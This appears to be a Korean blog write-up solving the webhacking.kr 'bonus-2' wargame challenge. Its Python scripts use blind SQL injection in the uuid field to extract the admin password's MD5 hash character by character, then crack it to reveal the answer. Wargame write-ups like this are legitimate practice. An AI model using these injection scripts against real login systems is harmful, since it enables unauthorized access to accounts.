guest/guest로 join
qwerty/qwerty로 join해도 해시 crack해보면 qwertyapple인 것을 알 수 있다.
DB에 입력한 비밀번호+"apple"로 저장되는 듯
import requests
i=1
while True:
URL = f"https://webhacking.kr/challenge/bonus-2/"
data = {
"uuid" : f"admin' and length(pw)={i}#",
"pw" : "asdf"
}
res = requests.post(URL, data=data)
if "Wrong password!" in res.text:
print(i)
break
i+=1
=> 32 (길이)
import requests
pw=""
for i in range(1, 33):
for c in range(48, 123):
URL = f"https://webhacking.kr/challenge/bonus-2/"
data = {
"uuid" : f"admin' and substr(pw,{i},1)=char({c})#",
"pw" : "asdf"
}
res = requests.post(URL, data=data)
if "Wrong password!" in res.text:
pw+=chr(c)
print(pw)
break
print(pw.lower())
=> 6c9ca386a903921d7fa230ffa0ffc153
https://www.md5online.org/md5-decrypt.html
wowapple => wow
'워게임 > webhacking.kr' 카테고리의 다른 글
webhacking.kr old 26번 (url decode 2번) (0) | 2021.10.23 |
---|---|
webhacking.kr old 25번(php wrapper) (0) | 2021.10.23 |
webhacking.kr old 21번(blind sql injection) (0) | 2021.10.22 |
webhacking.kr old 12번(javascript난독화 aaencode) (0) | 2021.10.21 |
webhacking.kr old 9번(sql injection) (0) | 2021.10.20 |
댓글